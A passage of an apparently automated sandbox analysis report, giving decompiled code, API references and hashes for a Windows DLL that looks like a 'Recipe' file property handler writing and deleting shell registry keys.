								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x10014c64;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}

0x10007719
0x1000771b
0x10007720
0x10007727
0x1000772d
0x1000772f
0x10007738
0x10007758
0x1000775c
0x1000775d
0x1000775e
0x10007765
0x10007767
0x1000776c
0x10007785
0x1000778a
0x10007790
0x10007799
0x1000779f
0x100077a2
0x100077a5
0x100077ae
0x100077b1
0x100077b7
0x100077ba
0x100077bd
0x100077c0
0x100077c3
0x100077c3
0x100077ce
0x100077d9
0x10007908
0x10007908
0x10007908
0x1000790e
0x00000000
0x00000000
0x10007919
0x1000791f
0x10007925
0x1000793a
0x10007940
0x10007947
0x1000794c
0x1000794e
0x10007942
0x10007944
0x10007944
0x10007958
0x1000795d
0x100079a4
0x100079aa
0x100079ad
0x100079b3
0x100079ba
0x100079bf
0x100079bf
0x00000000
0x10007963
0x10007964
0x1000796c
0x00000000
0x00000000
0x1000796e
0x10007970
0x10007978
0x10007985
0x10007990
0x10007995
0x10007999
0x1000799f
0x00000000
0x1000799f
0x1000798b
0x1000798d
0x1000798d
0x00000000
0x1000798d
0x1000797e
0x00000000
0x1000797e
0x1000792c
0x10007932
0x100079c6
0x100079c6
0x00000000
0x100079c6
0x10007925
0x100079cc
0x100079d3
0x1000774d
0x1000774f
0x10007750
0x10007755
0x10007755
0x100077df
0x100077e4
0x00000000
0x00000000
0x100077ea
0x100077ec
0x100077ef
0x100077f2
0x100077f7
0x10007801
0x10007803
0x10007805
0x10007805
0x1000780a
0x1000780b
0x1000780e
0x10007820
0x10007822
0x10007827
0x100078bb
0x100078c2
0x100078c8
0x100078d8
0x100078de
0x100078e1
0x100078e4
0x100078e8
0x100078ee
0x100078f1
0x100078f4
0x100078f7
0x100078f7
0x100078fc
0x100078fd
0x10007900
0x00000000
0x10007900
0x1000782d
0x10007833
0x00000000
0x10007833
0x10007836
0x10007838
0x1000783b
0x1000783e
0x10007841
0x10007849
0x1000784e
0x100078a8
0x100078a8
0x100078a9
0x100078af
0x100078b0
0x100078b3
0x100078b6
0x00000000
0x10007855
0x10007855
0x10007859
0x00000000
0x00000000
0x1000785d
0x1000786d
0x1000787a
0x10007881
0x10007886
0x1000788d
0x10007895
0x10007899
0x1000789f
0x100078a2
0x100078a5
0x100078a5
0x00000000
0x100078a5
0x10007860
0x10007866
0x1000786b
0x00000000
0x00000000
0x00000000
0x1000786b
0x1000784e
0x00000000
0x10007841
0x10007779
0x10007781
0x00000000
0x10007781
0x10007745
0x00000000

APIs

__lock.LIBCMT ref: 10007727

Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6

@_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
__calloc_crt.LIBCMT ref: 1000775E
@_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
__calloc_crt.LIBCMT ref: 10007819
GetFileType.KERNEL32 ref: 10007860
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
GetStdHandle.KERNEL32(-000000F6), ref: 10007952
GetFileType.KERNEL32 ref: 10007964
InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 301580142-0
Opcode ID: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
Instruction ID: 674899b519222b2de9a2fae7d59f7574afda57542dcf9298ac8c6c73304dea21
Opcode Fuzzy Hash: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
Instruction Fuzzy Hash: 6391D370D053569FEB10CF68C88059DBBF0FF462A0B25826DD4AAA73E5DB38D842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10003400, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E10003400(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				int _t26;
				wchar_t* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				void* _t40;
				WCHAR* _t41;
				short _t42;
				signed int _t44;
				void* _t48;
				short _t52;

				_t20 =  *0x10012158; // 0x4693ee51
				_v8 = _t20 ^ _t44;
				_t37 = _a8;
				_v1036 = _a4;
				_t41 = _a12;
				_v1040 = _a16;
				_t42 = 0;
				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
				if(_t26 < 0) {
					L4:
					_t42 = 0x8007007a;
					goto L5;
				} else {
					_t48 = _t26 - 0x1ff;
					if(_t48 > 0) {
						goto L4;
					} else {
						if(_t48 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t42 >= 0) {
					_t32 =  &_v1032;
					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
					_t42 = _t32;
					if(_t42 > 0) {
						_t52 = _t42;
					}
					if(_t52 >= 0) {
						_t33 = _v1036;
						if( *((char*)(_t33 + 0x26a)) == 0) {
							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
							if(_t33 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t37 = StrStrIW;
								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
			}

0x10003409
0x10003410
0x10003417
0x1000341b
0x10003425
0x10003428
0x1000343f
0x10003441
0x1000344b
0x10003458
0x10003458
0x00000000
0x1000344d
0x1000344d
0x10003452
0x00000000
0x10003454
0x10003454
0x1000345d
0x1000345f
0x1000345f
0x10003454
0x10003452
0x10003465
0x1000347a
0x1000348a
0x10003490
0x10003494
0x1000349f
0x1000349f
0x100034a1
0x100034a3
0x100034b0
0x100034ba
0x100034c2
0x100034e2
0x100034e8
0x100034c4
0x100034c4
0x100034d4
0x00000000
0x00000000
0x100034d4
0x100034c2
0x100034b0
0x100034a1
0x10003501

APIs

vswprintf.LIBCMT ref: 10003441

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
StrCmpNICW.SHLWAPI(4693EE51,Software\Classes\%s,00000013), ref: 100034BA
StrStrIW.SHLWAPI(4693EE51,PropertyHandlers), ref: 100034D0
StrStrIW.SHLWAPI(4693EE51,KindMap), ref: 100034DC

Strings

Software\Classes\%s, xrefs: 100034B4
PropertyHandlers, xrefs: 100034CA
KindMap, xrefs: 100034D6

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Value__vsnwprintf_llstrlenvswprintf
String ID: KindMap$PropertyHandlers$Software\Classes\%s
API String ID: 1581644826-984809517
Opcode ID: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
Instruction ID: d850e188dbc6640e840f0cd68e96ba4cbad68a3ac590cffcf769bc7201be35e9
Opcode Fuzzy Hash: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
Instruction Fuzzy Hash: B52185B5A00229ABE712DF68CC80BAF77ACEF04790F0180A5FB04FB145D635ED418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10003510, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10003510(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, char _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				int _t25;
				wchar_t* _t30;
				intOrPtr _t31;
				intOrPtr _t35;
				void* _t38;
				WCHAR* _t39;
				short _t40;
				signed int _t42;
				void* _t46;
				short _t50;

				_t19 =  *0x10012158; // 0x4693ee51
				_v8 = _t19 ^ _t42;
				_t35 = _a8;
				_v1036 = _a4;
				_t39 = _a12;
				_v1040 = _a16;
				_t40 = 0;
				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
				if(_t25 < 0) {
					L4:
					_t40 = 0x8007007a;
					goto L5;
				} else {
					_t46 = _t25 - 0x1ff;
					if(_t46 > 0) {
						goto L4;
					} else {
						if(_t46 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t40 >= 0) {
					_t30 =  &_v1032;
					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
					_t40 = _t30;
					if(_t40 > 0) {
						_t50 = _t40;
					}
					if(_t50 >= 0) {
						_t31 = _v1036;
						if( *((char*)(_t31 + 0x26a)) == 0) {
							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
							if(_t31 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t35 = StrStrIW;
								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
			}

0x10003519
0x10003520
0x10003527
0x1000352b
0x10003535
0x10003538
0x1000354f
0x10003551
0x1000355b
0x10003568
0x10003568
0x00000000
0x1000355d
0x1000355d
0x10003562
0x00000000
0x10003564
0x10003564
0x1000356d
0x1000356f
0x1000356f
0x10003564
0x10003562
0x10003575
0x10003585
0x1000358d
0x10003593
0x10003597
0x100035a2
0x100035a2
0x100035a4
0x100035a6
0x100035b3
0x100035bd
0x100035c5
0x100035e5
0x100035eb
0x100035c7
0x100035c7
0x100035d7
0x00000000
0x00000000
0x100035d7
0x100035c5
0x100035b3
0x100035a4
0x10003604

APIs

vswprintf.LIBCMT ref: 10003551

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
StrCmpNICW.SHLWAPI(4693EE51,Software\Classes\%s,00000013), ref: 100035BD
StrStrIW.SHLWAPI(4693EE51,PropertyHandlers), ref: 100035D3
StrStrIW.SHLWAPI(4693EE51,KindMap), ref: 100035DF

Strings

Software\Classes\%s, xrefs: 100035B7
PropertyHandlers, xrefs: 100035CD
Recipe (.recipe) Property Handler, xrefs: 1000352A
KindMap, xrefs: 100035D9

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Value__vsnwprintf_lvswprintf
String ID: KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
API String ID: 396321892-1357300599
Opcode ID: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
Instruction ID: 39f9389b0fe208d6d553e4c758c28d4d041f374c8ead2d52af9196b7918bc5e1
Opcode Fuzzy Hash: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
Instruction Fuzzy Hash: F321B4B5A0062AABE711CB588C81BDB77ECDF04791F0181A5EB04F7255D630DE418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10003310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10003310(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				void* _t24;
				intOrPtr _t26;
				signed short _t30;
				void* _t31;
				void* _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed short _t37;
				signed int _t40;
				void* _t44;

				_t16 =  *0x10012158; // 0x4693ee51
				_v8 = _t16 ^ _t40;
				_t35 = _a8;
				_v1036 = _a4;
				_t37 = 0;
				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
				if(_t21 < 0) {
					L4:
					_t37 = 0x8007007a;
					L5:
					_v10 = 0;
					L6:
					if(_t37 >= 0) {
						_t30 =  &_v1032;
						__imp__RegDeleteTreeW(_t35, _t30);
						_t37 = _t30;
						if(_t37 > 0) {
							_t37 = _t37 & 0x0000ffff | 0x80070000;
						}
					}
					_t36 = _a12;
					if(_t37 >= 0) {
						_t26 = _v1036;
						if( *((char*)(_t26 + 0x26a)) == 0) {
							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
								 *((char*)(_v1036 + 0x26a)) = 1;
							}
						}
					}
					_t38 =  ==  ? 0 : _t37;
					_t24 =  ==  ? 0 : _t37;
					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
				}
				_t44 = _t21 - 0x1ff;
				if(_t44 > 0) {
					goto L4;
				}
				if(_t44 != 0) {
					goto L6;
				} else {
					goto L5;
				}
			}

0x10003319
0x10003320
0x10003328
0x1000332b
0x10003344
0x10003346
0x10003350
0x1000335d
0x1000335d
0x10003362
0x10003364
0x10003368
0x1000336a
0x1000336c
0x10003374
0x1000337a
0x1000337e
0x10003383
0x10003383
0x1000337e
0x10003389
0x1000338e
0x10003390
0x1000339d
0x100033a7
0x100033af
0x100033d7
0x100033d7
0x100033af
0x1000339d
0x100033e9
0x100033ed
0x100033fa
0x100033fa
0x10003352
0x10003357
0x00000000
0x00000000
0x10003359
0x00000000
0x1000335b
0x00000000
0x1000335b

APIs

vswprintf.LIBCMT ref: 10003346

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7

Strings

Software\Classes\%s, xrefs: 100033A1
PropertyHandlers, xrefs: 100033B1
KindMap, xrefs: 100033C1

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteTree__vsnwprintf_lvswprintf
String ID: KindMap$PropertyHandlers$Software\Classes\%s
API String ID: 1945471109-984809517
Opcode ID: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
Instruction ID: 9a12c5af6921165393e350ba5b5d3422aefee07d893388e2def3c676086b3e3f
Opcode Fuzzy Hash: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
Instruction Fuzzy Hash: 40219571A00229ABE712DB658C84BAF7BACEF05790F0180A9EA44F7144DF34DE4187A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB53, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CB53(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E100076DE(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E1000C21F(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10014c80;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E1000C21F(2);
							if(E1000C21F(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E1000C21F(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E1000C199(_t35);
					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E10005EA5(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}

0x1000cb56
0x1000cb5d
0x1000cb66
0x1000cb73
0x1000cbc5
0x1000cbc5
0x1000cb75
0x1000cb75
0x1000cb7d
0x1000cb8b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb93
0x1000cb93
0x1000cb95
0x1000cba7
0x00000000
0x1000cba9
0x1000cba9
0x1000cbb9
0x00000000
0x1000cbbb
0x1000cbc1
0x1000cbc1
0x1000cbb9
0x1000cba7
0x1000cb7d
0x1000cbc8
0x1000cbe0
0x1000cbe7
0x1000cbf5
0x1000cbe9
0x1000cbf0
0x1000cbf0
0x1000cbfa
0x1000cb5f
0x1000cb63
0x1000cb63

APIs

__ioinit.LIBCMT ref: 1000CB56

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

__get_osfhandle.LIBCMT ref: 1000CB6A
__get_osfhandle.LIBCMT ref: 1000CB95
__get_osfhandle.LIBCMT ref: 1000CB9E
__get_osfhandle.LIBCMT ref: 1000CBAA
CloseHandle.KERNEL32(00000000), ref: 1000CBB1
GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
__free_osfhnd.LIBCMT ref: 1000CBC8
__dosmaperr.LIBCMT ref: 1000CBEA

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
String ID:
API String ID: 974577687-0
Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150

Uniqueness

Uniqueness Score: -1.00%

Function 10002A10, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
VariantClear.OLEAUT32(?), ref: 10002B69

Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A

PropVariantClear.OLE32(?), ref: 10002B59
VariantClear.OLEAUT32(?), ref: 10002B63

Strings

EncodedValue, xrefs: 10002B09
Key, xrefs: 10002ACA
Recipe/ExtendedProperties/Property, xrefs: 10002A35

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
API String ID: 3673094071-3396277477
Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100061BA, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100061BA(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E1000750E(_t3);
				if(E100092DA() != 0) {
					_t6 = E10007E6B(_t5, E10005F1A);
					 *0x10012310 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E10007F1D(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E10006230();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10007E95(_t9,  *0x10012310, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000610E(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E10006230();
					return 0;
				}
			}

0x100061ba
0x100061c6
0x100061d5
0x100061db
0x100061e0
0x100061e3
0x00000000
0x100061e5
0x100061f2
0x100061f6
0x100061f8
0x10006227
0x10006227
0x1000622c
0x1000622f
0x100061fa
0x10006208
0x1000620a
0x00000000
0x1000620c
0x1000620c
0x1000620e
0x1000620f
0x10006216
0x1000621c
0x10006220
0x10006224
0x10006226
0x10006226
0x1000620a
0x100061f8
0x100061c8
0x100061c8
0x100061c8
0x100061cf
0x100061cf

APIs

__init_pointers.LIBCMT ref: 100061BA

Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532

__mtinitlocks.LIBCMT ref: 100061BF

Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8

__mtterm.LIBCMT ref: 100061C8

Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F

__calloc_crt.LIBCMT ref: 100061ED
__initptd.LIBCMT ref: 1000620F
GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 757573777-0
Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150

Uniqueness

Uniqueness Score: -1.00%

Function 1000C468, Relevance: 9.1, APIs: 6, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E100076DE(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E100095F8(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if((_t79 & 0x00000082) != 0) {
						__eflags = _t79 & 0x00000040;
						if((_t79 & 0x00000040) == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
